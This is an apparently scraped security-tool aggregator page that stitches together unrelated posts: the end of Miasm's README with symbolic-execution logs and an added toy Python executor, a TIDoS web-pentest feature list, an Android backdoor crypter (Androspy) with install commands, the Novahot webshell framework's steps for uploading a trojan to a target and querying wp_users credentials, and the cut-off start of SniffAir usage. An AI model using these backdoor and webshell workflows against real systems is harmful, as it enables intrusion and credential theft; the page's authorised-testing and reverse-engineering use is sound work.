zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
....
4000000e JMP        loc_0000000040000013:0x40000013
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000013 MOV        EAX, EBX
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000015 RET
>>>

Interacting with the jitter:

>>> jitter.vm
ad 1230000 size 10000 RW_ hpad 0x2854b40
ad 40000000 size 16 RW_ hpad 0x25e0ed0
>>> hex(jitter.cpu.EAX)
'0x0L'
>>> jitter.cpu.ESI = 12

Symbolic execution

Initializing the IR pool (the location database is the one filled in by the disassembly above):

>>> ira = machine.ira(asmcfg.loc_db)
>>> ircfg = ira.new_ircfg_from_asmcfg(asmcfg)

Initializing the engine with default symbolic values:

>>> from miasm2.ir.symbexec import SymbolicExecutionEngine
>>> sb = SymbolicExecutionEngine(ira)

Launching the execution:

>>> symbolic_pc = sb.run_at(ircfg, 0)
>>> print symbolic_pc
((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)

Same, with step logs (only changes are displayed):

>>> sb = SymbolicExecutionEngine(ira, machine.mn.regs.regs_init)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA        ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
ECX = ECX + 0x4
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
EBX = EBX + 0x1
ECX = ECX + 0x4
________________________________________________________________________________
Instr CMP        CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
pf = parity((ECX + 0x4)[0:8] + 0xFF)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = ECX + 0x4
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
Instr JZ         loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = ECX + 0x4
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
>>>

Retry execution with a concrete ECX.
Here, the symbolic / concolic execution reaches the shellcode's end (note that the engine keeps the state left by the previous run, so EBX already carries the + 0x1 from it):

>>> from miasm2.expression.expression import ExprInt
>>> sb.symbols[machine.mn.regs.ECX] = ExprInt(-3, 32)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA        ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = 0x1
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x1
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = parity((ECX + 0x4)[0:8] + 0xFF)
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX = 0x1
of = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX = EBX + 0x2
________________________________________________________________________________
Instr CMP        CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af = 0x0
EIP = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
pf = 0x1
IRDst = ((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x2
________________________________________________________________________________
Instr JZ         loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
EIP = zf?(loc_key_1,loc_key_2)
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x10
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x2
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x10
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
IRDst = loc_key_3
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x13
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
________________________________________________________________________________
Instr MOV        EAX, EBX
Assignblk:
EAX = EBX
________________________________________________________________________________
af = 0x0
EIP = 0x10
pf = 0x1
IRDst = 0x13
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
EAX = EBX + 0x3
________________________________________________________________________________
Instr RET
Assignblk:
IRDst = @32[ESP[0:32]]
ESP = {ESP[0:32] + 0x4 0 32}
EIP = @32[ESP[0:32]]
________________________________________________________________________________
af = 0x0
EIP = @32[ESP]
pf = 0x1
IRDst = @32[ESP]
zf = 0x1
ECX = 0x1
of = 0x0
nf = 0x0
cf = 0x0
EBX = EBX + 0x3
ESP = ESP + 0x4
EAX = EBX + 0x3
________________________________________________________________________________
>>>

How does it work?

Miasm embeds its own disassembler, intermediate language and instruction semantics. It is written in Python.

To emulate code, it uses LLVM, GCC, Clang or Python to JIT the intermediate representation. It can emulate shellcodes and all or parts of binaries. Python callbacks can be executed to interact with the execution, for instance to emulate the effects of library functions.

Documentation

TODO

An auto-generated documentation is available here.

Obtaining Miasm

- Clone the repository: Miasm on GitHub
- Get one of the Docker images at Docker Hub

Software requirements

Miasm uses:
- python-pyparsing
- python-dev
- elfesteem from Elfesteem
- optionally python-pycparser (version >= 2.17)

To enable code JIT, one of the following modules is mandatory:
- GCC
- Clang
- LLVM with Numba llvmlite, see below

Optionally, Miasm can also use:
- Z3, the Theorem Prover

Configuration

Install elfesteem:

git clone https://github.com/serpilliere/elfesteem.git elfesteem
cd elfesteem
python setup.py build
sudo python setup.py install

To use the jitter, GCC or LLVM is recommended:
- GCC (any version)
- Clang (any version)
- LLVM
  - Debian (testing/unstable): Not tested
  - Debian stable/Ubuntu/Kali/whatever: pip install llvmlite or install from llvmlite
  - Windows: Not tested

Build and install Miasm:

$ cd miasm_directory
$ python setup.py build
$ sudo python setup.py install

If something goes wrong during the compilation of one of the jitter modules, Miasm will skip the error and disable the corresponding module (see the compilation output).

Windows & IDA

Most of Miasm's IDA plugins use a subset of Miasm functionality. A quick way to have them working is to add:
- the elfesteem directory and pyparsing.py to C:\…\IDA\python\ (or pip install pyparsing elfesteem)
- the miasm2/miasm2 directory to C:\…\IDA\python\

All features except the JITter related ones will be available. For a more complete installation, please refer to the paragraphs above.

Testing

Miasm comes with a set of regression tests. To run all of them:

cd miasm_directory/test
python test_all.py

Some options can be specified:
- Mono threading: -m
- Code coverage instrumentation: -c
- Only fast tests: -t long (excludes the long tests)

They already use Miasm

Tools
- Sibyl: A function divination tool
- R2M2: Use miasm2 as a radare2 plugin
- CGrex: Targeted patcher for CGC binaries
- ethRE: Reversing tool for Ethereum EVM (with corresponding Miasm2 architecture)

Blog posts / papers / conferences
- Deobfuscation: recovering an OLLVM-protected program
- Taming a Wild Nanomite-protected MIPS Binary With Symbolic Execution: No Such Crackme
- Génération rapide de DGA avec Miasm: Quick computation of DGA (French article)
- Enabling Client-Side Crash-Resistance to Overcome Diversification and Information Hiding: Detect undirected call potential arguments
- Miasm: Framework de reverse engineering (French)
- Tutorial miasm (French video)
- Graphes de dépendances : Petit Poucet style: DepGraph (French)

Books
- Practical Reverse Engineering: X86, X64, Arm, Windows Kernel, Reversing Tools, and Obfuscation: Introduction to Miasm (Chapter 5 "Obfuscation")
- BlackHat Python – Appendix: Japan security book's samples

Misc

Man, does miasm have a link with rr0d?
Yes! Crappy code and ugly documentation.

Download Miasm
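The two symbolic runs shown in the Miasm walk-through above (an unconstrained ECX that stops at the JZ with a conditional program counter, then ECX = -3 which decides the branch and ends at RET with EAX = EBX + 0x3) can be reproduced with a tiny from-scratch symbolic executor. The following is an added example written for this page, not Miasm code and not Miasm's API: it works from the page's own listing instead of decoding bytes, models only the register arithmetic this shellcode needs, and, like the Miasm session, keeps its state between runs (which is why the second run lands on EBX + 0x3 rather than + 0x2).

```python
"""Toy symbolic executor for the nine-instruction shellcode above.
Constructed example for this page; NOT Miasm code. A register holds either a
concrete 32-bit int or a symbolic (base, offset) pair meaning "<base> + offset".
A JZ whose zero flag is symbolic stops execution and returns an Ite, the same
shape as Miasm's "((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)" result."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union

MASK32 = 0xFFFFFFFF
Sym = Tuple[str, int]          # ("EBX", 3) stands for EBX + 0x3
Value = Union[int, Sym]


@dataclass(frozen=True)
class Ite:
    """Unresolved branch in Miasm's notation: cond?(if_nonzero, if_zero)."""
    cond: str
    if_nonzero: int
    if_zero: int


# The page's listing, already decoded: (mnemonic, operands..., length).
CODE: Dict[int, Tuple] = {
    0x00: ("lea", "ECX", "ECX", 4, 3),
    0x03: ("lea", "EBX", "EBX", 1, 3),
    0x06: ("cmp_cl", 1, 3),          # CMP CL, 0x1
    0x09: ("jz", 0x10, 0x0B),        # (taken target, fall-through)
    0x0B: ("lea", "EBX", "EBX", -1, 3),
    0x0E: ("jmp", 0x13),
    0x10: ("lea", "EBX", "EBX", 1, 3),
    0x13: ("mov", "EAX", "EBX", 2),
    0x15: ("ret",),
}


def add(v: Value, imm: int) -> Value:
    """32-bit wrap-around add on a concrete or symbolic value."""
    if isinstance(v, int):
        return (v + imm) & MASK32
    base, off = v
    return (base, (off + imm) & MASK32)


def fmt(v: Value) -> str:
    """Render a value the way Miasm prints it (upper-case hex)."""
    if isinstance(v, int):
        return f"0x{v:X}"
    base, off = v
    return base if off == 0 else f"{base} + 0x{off:X}"


class ToySymbExec:
    """State persists across run_at() calls, as in the Miasm session above."""

    def __init__(self) -> None:
        # every register starts as its own symbol, like regs_init in Miasm
        self.symbols: Dict[str, Value] = {
            r: (r, 0) for r in ("EAX", "EBX", "ECX", "EDX", "ESP")}
        self.zf: Optional[bool] = None   # None means "symbolic"
        self.zf_expr = ""                # expression that is zero iff zf is set

    def run_at(self, addr: int, max_steps: int = 64) -> Union[Ite, str]:
        pc = addr
        for _ in range(max_steps):
            insn = CODE[pc]
            op = insn[0]
            if op == "lea":                       # LEA dst, [src + imm]
                _, dst, src, imm, size = insn
                self.symbols[dst] = add(self.symbols[src], imm)
                pc += size
            elif op == "cmp_cl":                  # only zf is modelled
                _, imm, size = insn
                ecx = self.symbols["ECX"]
                if isinstance(ecx, int):
                    self.zf = (((ecx & 0xFF) - imm) & 0xFF) == 0
                else:
                    self.zf = None
                    # Miasm writes CL - imm as CL + (-imm mod 256), hence "+ 0xFF"
                    self.zf_expr = f"({fmt(ecx)})[0:8] + 0x{(-imm) & 0xFF:X}"
                pc += size
            elif op == "jz":
                _, taken, fallthrough = insn
                if self.zf is None:               # undecidable: report both successors
                    return Ite(self.zf_expr, fallthrough, taken)
                pc = taken if self.zf else fallthrough
            elif op == "jmp":
                pc = insn[1]
            elif op == "mov":
                _, dst, src, size = insn
                self.symbols[dst] = self.symbols[src]
                pc += size
            elif op == "ret":                     # IRDst = @32[ESP]; ESP = ESP + 4
                esp = self.symbols["ESP"]
                self.symbols["ESP"] = add(esp, 4)
                return f"@32[{fmt(esp)}]"
        raise RuntimeError("step limit reached")


if __name__ == "__main__":
    sb = ToySymbExec()
    print("symbolic ECX ->", sb.run_at(0))       # Ite over (ECX + 0x4)[0:8] + 0xFF
    sb.symbols["ECX"] = (-3) & MASK32            # the ExprInt(-3, 32) of the session
    print("ECX = -3     ->", sb.run_at(0))       # @32[ESP]
    print("EAX =", fmt(sb.symbols["EAX"]))      # EBX + 0x3
```

A fresh engine with a concrete ECX whose low byte does not become 1 takes the fall-through path instead, so the toy also shows the other branch the real engine would need a solver to explore.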

Link: http://feedproxy.google.com/~r/PentestTools/~3/Cx6IGqWfrzI/miasm-reverse-engineering-framework-in.html

TIDoS-Framework v1.7 – The Offensive Manual Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-app audit framework. Let's keep this simple.

Highlights :-

The main highlights of this framework are:
- TIDoS Framework now boasts of a century+ of modules.
- A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.
- Has 5 main phases, subdivided into 14 sub-phases consisting of a total of 104 modules.
- Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
- Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc).
- Vulnerability Analysis Phase has 36 modules (including most common vulnerabilities in action).
- Exploits Castle has only 1 exploit (purely developmental).
- And finally, Auxiliaries have got 4 modules (under dev).
- All four phases each have an Auto-Awesome module which automates every module for you.
- You just need the domain, and leave everything else to this tool.
- TIDoS has full verbose output support, so you'll know what's going on.
- Fully user friendly interaction environment.

Installation :-

Clone the repository locally and navigate there:

git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework

Install the dependencies:

chmod +x install
./install

That's it! Now you are good to go! Now let's run the tool:

tidos

Getting Started :-

TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.

But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under the files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!

Finally, as the framework opens up, enter the website name, e.g. http://www.example.com, and let TIDoS lead you. That's it! It's as easy as that.

Recommended: Follow the order of the tool (run in a schematic way): Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis

To update this tool, use the tidos_updater.py module under the tools/ folder.

Flawless Features :-

TIDoS Framework presently supports the following, and is under active development:

Reconnaissance + OSINT

Passive Reconnaissance:
- Nping Enumeration (via external API)
- WhoIS Lookup (domain info gathering)
- GeoIP Lookup (pinpoint physical location)
- DNS Configuration Lookup (DNSDump)
- Subdomains Lookup (indexed ones)
- Reverse DNS Lookup (host instances)
- Reverse IP Lookup (hosts on same server)
- Subnets Enumeration (class based)
- Domain IP History (IP instances)
- Web Links Gatherer (indexed ones)
- Google Search (manual search)
- Google Dorking (multiple modules, automated)
- Email to Domain Resolver (email WhoIs)
- Wayback Machine Lookups (find backups)
- Breached Email Check (pwned email accounts)
- Enumeration via Google Groups (emails only)
- Check Alias Availability (social networks)
- Find PasteBin Posts (domain based)
- LinkedIn Gathering (employees & company)
- Google Plus Gathering (domain profiles)
- Public Contact Info Scraping (FULL CONTACT)
- Censys Intel Gathering (domain based)
- Threat Intelligence Gathering (bad IPs)

Active Reconnaissance:
- Ping Enumeration (advanced)
- CMS Detection (185+ CMSs supported; IMPROVED)
- Advanced Traceroute (IMPROVED)
- robots.txt and sitemap.xml Checker
- Grab HTTP Headers (live capture)
- Find HTTP Methods Allowed (via OPTIONS)
- Detect Server Type (IMPROVED)
- Examine SSL Certificate (absolute)
- Apache Status Disclosure Checks (file based)
- WebDAV HTTP Enumeration (PROPFIND & SEARCH)
- PHPInfo File Enumeration (via bruteforce)
- Comments Scraper (regex based)
- Find Shared DNS Hosts (name server based)
- Alternate Sites Discovery (User-Agent based)
- Discover Interesting Files via Bruteforce:
  - Common Backdoor Locations (shells, etc.)
  - Common Backup Locations (.bak, .db, etc.)
  - Common Password Locations (.pgp, .skr, etc.)
  - Common Proxy Path Configs (.pac, etc.)
  - Common Dot Files (.htaccess, .apache, etc.)

Information Disclosure:
- Credit Cards Disclosure (if plaintext)
- Email Harvester (IMPROVED)
- Fatal Errors Enumeration (includes Full Path Disclosure)
- Internal IP Disclosure (signature based)
- Phone Number Harvester (signature based)
- Social Security Number Harvester (US ones)

Scanning & Enumeration

- Remote Server WAF Enumeration (generic, 54 WAFs)
- Port Scanning (ingenious modules):
  - Simple Port Scanner (via socket connections)
  - TCP SYN Scan (highly reliable)
  - TCP Connect Scan (highly reliable)
  - XMAS Flag Scan (reliable only in LANs)
  - FIN Flag Scan (reliable only in LANs)
  - Port Service Detector
- Web Technology Enumeration (absolute)
- Operating System Fingerprinting (IMPROVED)
- Banner Grabbing of Services (via open ports)
- Interactive Scanning with NMap (16 preloaded modules)
- Enumeration of Domain-Linked IPs (using CENSYS database)
- Web and Links Crawlers:
  - Depth 1 (indexed URI crawler)
  - Depth 2 (single page crawler)
  - Depth 3 (web link crawler)

Vulnerability Analysis

Web-Bugs & Server Misconfigurations:
- Insecure CORS (absolute)
- Same-Site Scripting (sub-domain based)
- Zone Transfer (DNS server based)
- Clickjacking:
  - Frame-Busting Checks
  - X-FRAME-OPTIONS Header Checks
- Security on Cookies:
  - HTTPOnly Flag
  - Secure Flag
- Cloudflare Misconfiguration Check:
  - DNS Misconfiguration Checks
  - Online Database Lookup For Breaches
- HTTP Strict Transport Security Usage (HTTPS enabled but no HSTS)
- Domain Based Email Spoofing:
  - Missing SPF Records
  - Missing DMARC Records
- Host Header Injection (port based, over HTTP 80)
- X-Forwarded-For Header Injection
- Security Headers Analysis (live capture)
- Cross-Site Tracing (HTTP TRACE method)
- Session Fixation via Cookie Injection
- Network Security Misconfig.: checks for TELNET enabled via port 23

Serious Web Vulnerabilities:
- File Inclusions:
  - Local File Inclusion (LFI) (param based)
  - Remote File Inclusion (RFI) (IMPROVED): parameter based, pre-loaded path based
- OS Command Injection (Linux & Windows, RCE)
- Path Traversal (sensitive paths)
- Cross-Site Request Forgery (absolute)
- SQL Injection:
  - Error Based Injection: cookie value based, Referer value based, User-Agent value based, auto-gathering (IMPROVED)
  - Blind Based Injection (crafted payloads): cookie value based, Referer value based, User-Agent value based, auto-gathering (IMPROVED)
- LDAP Injection (parameter based)
- HTML Injection (parameter based)
- Bash Command Injection (ShellShock)
- XPATH Injection (parameter based)
- Cross-Site Scripting (IMPROVED): cookie value based, Referer value based, User-Agent value based, parameter value based (manual)
- Unvalidated URL Forwards (open redirect)
- PHP Code Injection (Windows + Linux)
- HTTP Response Splitting (CRLF injection): User-Agent value based, parameter value based (manual)
- Sub-domain Takeover (50+ services): single sub-domain (manual), all subdomains (automated)

Other:
- PlainText Protocol Default Credential Bruteforce: FTP, SSH, POP 2/3, SQL, XMPP, SMTP and TELNET protocols

Auxiliary Modules:
- Hash Generator (MD5, SHA1, SHA256, SHA512)
- String & Payload Encoder (7 categories)
- Forensic Image Analysis (metadata extraction)
- Web HoneyPot Probability (ShodanLabs HoneyScore)

Exploitation (purely developmental):
- ShellShock

Other Tools:
- net_info.py: displays information about your network. Located under tools/.
- tidos_updater.py: updates the framework to the latest release via signature matching. Located under tools/.

TIDoS In Action:

Version: v1.7 [latest release] [#stable]

Upcoming:

These are some modules which I have thought of adding:
- Some more Enumeration & Information Disclosure modules.
- Lots more OSINT & stuff (let that be a suspense).
- More Auxiliary Modules.
- Some Exploits are also being worked on.

Ongoing:
- Working on a full-featured Web UI implementation on Flask and MongoDB and Node.js.
- Working on a new framework, a real framework. To be released with v2.
- Working on a campaign feature + addition of arguments.
- Normal bug fixing, as per the issues being raised.

Some other perks:
- Working on a way for contributing new modules easily.
- A complete new method of multi-threaded fuzzing of parameters.
- Keeping better track of new console stuff.

Download TIDoS-Framework

Link: http://www.kitploit.com/2018/11/tidos-framework-v17-offensive-manual.html

Androspy – Backdoor Crypter & Creator With Automatic IP Poisener

Androspy is a backdoor crypter & creator with automatic IP poisoner, coded by Belahsan Ouerghi.

Dependencies
- keytool
- jarsigner
- Apache2
- Metasploit-Framework
- xterm

Installation

sudo apt-get install git
git clone https://github.com/TunisianEagles/Androspy.git
cd Androspy
chmod +x setup.sh
sudo ./setup.sh
chmod +x androspy.sh
sudo ./androspy.sh

Tested on:
- BackBox Linux
- Kali Linux
- Parrot OS

Contact
- Contact: Tunisian Eagles
- [Email]: tunisianeagles@protonmail.com (TunisianEagles)
- Website: TunisianEagles

Download Androspy

Link: http://feedproxy.google.com/~r/PentestTools/~3/8EjIvxwgg_w/androspy-backdoor-crypter-creator-with.html

Novahot – A Webshell Framework For Penetration Testers

novahot is a webshell framework for penetration testers. It implements a JSON-based API that can communicate with trojans written in any language. By default, it ships with trojans written in PHP, Ruby, and Python.

Beyond executing system commands, novahot is able to emulate interactive terminals, including mysql, sqlite3, and psql. It additionally implements "virtual commands" that make it possible to upload, download, edit, and view remote files locally using your preferred applications.

Installation

Install the executable directly from npm:

[sudo] npm install -g novahot

Then seed a config file:

novahot config > ~/.novahotrc

Usage

1. View the available trojans with novahot trojan list.
2. Select a trojan in a language that is appropriate for your target, then copy its source to a new file. (Ex: novahot trojan view basic.php > ~/my-trojan.php)
3. Change the control password in the newly-created trojan.
4. Upload the trojan to a web-accessible location on the target.
5. Configure target information in the targets property in ~/.novahotrc.
6. Run novahot shell to open a shell.

Shell Modes

Internally, novahot uses "modes" and "adapters" to emulate various interactive clients, currently including the mysql, psql (postgres), and sqlite3 clients.

To change novahot's mode, issue the appropriate "dot command":

.mysql { "username" : "mysql-user", "password" : "the-password", "database" : "the-database" }

(Connection parameters may be specified as JSON while changing modes, or alternatively saved as target configuration data in ~/.novahotrc.)

For example, the mysql mode makes it possible to directly run queries like the following:

mysql> SELECT ID, user_login, user_email, user_pass FROM wp_users;

There additionally exists a payload mode that can be used to POST arbitrary data to the trojan. See the wiki for more information.

Virtual Commands

novahot implements four "virtual commands" that utilize payloads built in to the trojans to extend the functionality of the shell:

download
download <remote-filename> [<local-filename>]
Downloads <remote-filename> to --download-dir, and optionally renames it to <local-filename> if specified.

upload
upload <local-filename> [<remote-filename>]
Uploads <local-filename> to the shell's cwd, and optionally renames <local-filename> to <remote-filename> if specified.

view
view <remote-filename> [<local-filename>]
Downloads <remote-filename> to --download-dir, and optionally renames it to <local-filename>. After downloading, the file will be opened by the "viewer" application specified in the configs.

edit
edit <remote-filename>
Downloads <remote-filename> to a temporary file, and then opens that file for editing using the "editor" specified in the configs. Afterward, if changes to the file are saved locally, the file will be re-uploaded to the server automatically.

Provisioning a Test Environment

This repository contains a laboratory environment built on Vagrant, Docker, and the Damn Vulnerable Web Application ("DVWA"). Steps for provisioning the environment vary depending on the capabilities of your physical host.

Using docker-compose

If you have docker and docker-compose installed on your physical host, you may simply do the following:
1. Clone and cd to this repository
2. Run: docker-compose up
3. After the docker container starts, the DVWA will be accessible at http://localhost:80.

Using vagrant

If docker is not installed on your physical host, you may use Vagrant/Virtualbox to access a docker-capable virtual machine:
1. Clone and cd to this repository
2. Provision a virtual machine: vagrant up
3. SSH into the virtual machine: vagrant ssh
4. Start the docker container: sudo su; cd /vagrant; docker-compose up
5. The DVWA will be accessible at http://localhost:8000.

Configuring novahot against the laboratory environment

Specify the following connection strings in your ~/.novahotrc file to connect the novahot client to the PHP trojan embedded in the DVWA container:

{
  "targets": {
    "dvwa": {
      "uri": "http://localhost:8000/novahot.php",
      "password": "the-password",
      "mysql": {
        "username": "root",
        "password": "vulnerables",
        "database": "dvwa"
      }
    }
  }
}

You may then establish a webshell via:

novahot shell dvwa

Additional Information

Additional information can be found in the wiki:
- Configuration
- The Client/Trojan API
- sqlite3 "dot command" conflicts

Download Novahot

Link: http://www.kitploit.com/2018/11/novahot-webshell-framework-for.html

SniffAir – A Framework For Wireless Pentesting

SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic, looking for potential security flaws. Along with the prebuilt queries, SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.

SniffAir is developed by @Tyl0us and @theDarracott

Install

SniffAir was developed with Python version 2.7. Tested and supported on Kali Linux, Debian and Ubuntu.

To install, run the setup.sh script:

$ ./setup.sh

Usage

[SniffAir ASCII-art banner] (@Tyl0us & @theDarracott)

>> [default]# help
Commands
========
workspace               Manages workspaces (create, list, load, delete)
live_capture            Initiates a valid wireless interface to collect wireless pakcets to be parsed (requires the interface name)
offline_capture         Begins parsing wireless packets using a pcap file - kismet .pcapdump work best (requires the full path)
offline_capture_list    Begins parsing wireless packets using a list of pcap file - kismet .pcapdump work best (requires the full path)
query                   Executes a query on the contents of the acitve workspace
help                    Displays this help menu
clear                   Clears the screen
show                    Shows the contents of a table, specific information across all tables or the available modules
inscope                 Add ESSID to scope. inscope [ESSID]
SSID_Info               Displays all information (i.e all BSSID, Channels and Encrpytion) related to the inscope SSIDS
use                     Use a SniffAir module
info                    Displays all variable information regarding the selected module
set                     Sets a variable in module
exploit                 Runs the loaded module
run                     Runs the loaded module
exit                    Exit SniffAir
>> [default]#

Begin

First create or load a new or existing workspace using the workspace create or workspace load <workspace> command. To view all existing workspaces use the workspace list command, and the workspace delete <workspace> command to delete the desired workspace:

>> [default]# workspace
Manages workspaces
Command Option: workspaces [create|list|load|delete]
>> [default]# workspace create demo
[+] Workspace demo created

Load data into a desired workspace from a pcap file using the command offline_capture <the full path to the pcap file>. To load a series of pcap files use the command offline_capture_list <the full path to the file containing the list of pcap names> (this file should contain the full paths to each pcap file). Use the live_capture <interface name> command to capture live wireless traffic using a wireless interface.

>> [demo]# offline_capture /root/sniffair/demo.pcapdump
